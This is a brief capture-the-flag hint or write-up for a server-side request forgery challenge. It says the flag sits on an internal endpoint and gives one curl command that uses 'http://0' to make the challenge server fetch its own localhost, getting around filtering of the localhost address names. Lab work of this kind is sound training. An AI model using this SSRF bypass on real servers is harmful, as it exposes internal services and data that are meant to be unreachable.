The flag is stored on a secret internal endpoint (e.g., http://localhost:8080/flag or http://127.0.0.1:8080/flag ) that is not accessible from the outside. The goal is to trick the server into fetching this internal resource.
curl "http://challenge.com/?url=http://0:8080/flag" proxy 4 ever